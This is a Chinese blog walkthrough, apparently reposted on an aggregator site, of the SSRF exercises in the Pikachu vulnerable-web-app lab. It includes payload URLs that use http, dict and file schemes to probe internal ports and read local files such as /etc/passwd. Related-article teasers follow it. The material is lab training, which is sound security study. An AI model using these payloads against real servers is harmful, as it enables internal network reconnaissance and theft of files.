pikachu_ssrf攻略

10月前作者：爱吃银鱼焖蛋分类：Toy博客阅读(69) 违法举报

这篇具有很好参考价值的文章主要介绍了pikachu_ssrf攻略。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

ssrf（curl）：

打开pikachu靶场：

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_info/info1.php

发现URL地址最后面是info1.php 猜测一下有没有可能存在info2.php?

尝试修改访问地址：

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

因为curl支持很多协议（http，file想，dict等），尝试访问一下：

文件访问（http）

比如说修改url为：?url=http://www.baidu.com，访问百度页面?url=http://www.baidu.com/robots.txt，访问百度文件等

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

端口扫描（http，dict）

使用dict协议可以获取内网主机开放端口相应服务的指纹信息，比如说主机开了http端口

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

读取本地文件（file）

修改url为：?url=file:///etc/passwd，查看文件的内容：

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

ssrf（file_get_content）

首先了解什么是file_get_content的使用：

file_get_contents() 把整个文件读入一个字符串中。
语法：file_get_contents(path,include_path,context,start,max_length)

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

进行协议测试：

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

文件读取

读取本地信息?file=file:///c:/1.txt

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全

http协议请求内网资源

?file=http://127.0.0.1/ssrf/ssrf_curl.php读取文件内容

pikachu_ssrf攻略,渗透测试漏洞,网络安全,ssrf,网络安全文章来源地址https://www.toymoban.com/news/detail-821227.html

到了这里，关于pikachu_ssrf攻略的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

网络安全-pikachu之文件上传漏洞2

进入到第二个文件上传漏洞，发现名字是MIME type，并且查看前端源代码没发现限制，所以是后段，盲猜通过抓包就可以绕过后段限制。先知道MIME type是什么，通过查找资料发现是：Content-Type是返回消息中非常重要的内容，表示后面的文档属于什么MIME类型。Content-Type: [type]/[

2024年02月21日
浏览(45)
十六、pikachu之SSRF

SSRF(Server-Side Request Forgery：服务器端请求伪造)：其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能，但又没有对目标地址做严格过滤与限制，导致攻击者可以传入任意的地址来让后端服务器对其发起请求，并返回对该目标地址请求的数据。数据

2024年02月10日
浏览(40)
学网络安全怎么挖漏洞？怎么渗透？

前言有不少阅读过我文章的伙伴都知道，我从事网络安全行业已经好几年，积累了丰富的经验和技能。在这段时间里，我参与了多个实际项目的规划和实施，成功防范了各种网络攻击和漏洞利用，提高了安全防护水平。也有很多小伙伴私信问我怎么学？怎么挖漏洞？怎么渗

2024年02月04日
浏览(53)
SSRF服务器请求伪造原理和pikachu靶场实验

★★ 免责声明★★ 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与学习之用，读者将信息做其他用途，由Ta承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 1、SSRF简介 SSRF全称：Server-Side Request Forgery，服务器端请求伪造，是指攻击者能够从易受攻

2024年03月13日
浏览(49)
《WEB安全渗透测试》（37）内网渗透神器：fscan使用攻略

Fscan是一款内网综合扫描工具，它非常的方便，一键启动，之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。这

2024年02月13日
浏览(42)
信息服务上线渗透检测网络安全检查报告和解决方案4(网站风险等级评定标准、漏洞危害分级标准、漏洞安全建议)

信息服务上线渗透检测网络安全检查报告和解决方案3(系统漏洞扫描、相对路径覆盖RPO漏洞、nginx漏洞修复) 信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级) 信息服务上线渗透检测网络安

2024年02月12日
浏览(48)
网络安全渗透测试实验一

理解网络扫描、网络侦察的作用；通过搭建网络渗透测试平台，了解并熟悉常用搜索引擎、扫描工具的应用，通过信息收集为下一步渗透工作打下基础。系统环境：Kali Linux 2、Windows 网络环境：交换网络结构实验工具： Metasploitable2（需自行下载虚拟机镜像）；Nmap（Kali）；

2023年04月26日
浏览(53)
智能网联汽车网络安全测试：渗透测试，模糊测试详细讲解

车内网络系统架构随着智能网联汽车电子系统的复杂化，电子电气架构（ Electrical/Electronic Architecture， EEA ）由分布式向集中式架构演进，如图 2.1 所示。在汽车 EEA 演进的同时，为了满足不同复杂程度的汽车功能对于通信性能的需求，车内总线协议也在不断发展。CAN 总线协

2024年01月23日
浏览(45)
【网络安全】渗透测试之木马免杀

博主昵称：跳楼梯企鹅博主主页面链接：博主主页传送门博主专栏页面连接：

2024年02月02日
浏览(50)
记一次网络安全渗透测试实战指南

网址已无法访问，就不贴了可以使用Fofa，火线，zoomeye，searchcode.com等爬取相关的资产，重点关注一些有漏洞暴露的框架和服务例如：泛微，PHP，Tomca，后台，weblogic等等。之后就主要分三步：指纹识别、漏洞验证、漏洞复现。指纹识别很好理解，我们要拿历史漏洞怼它，首

2024年02月08日
浏览(57)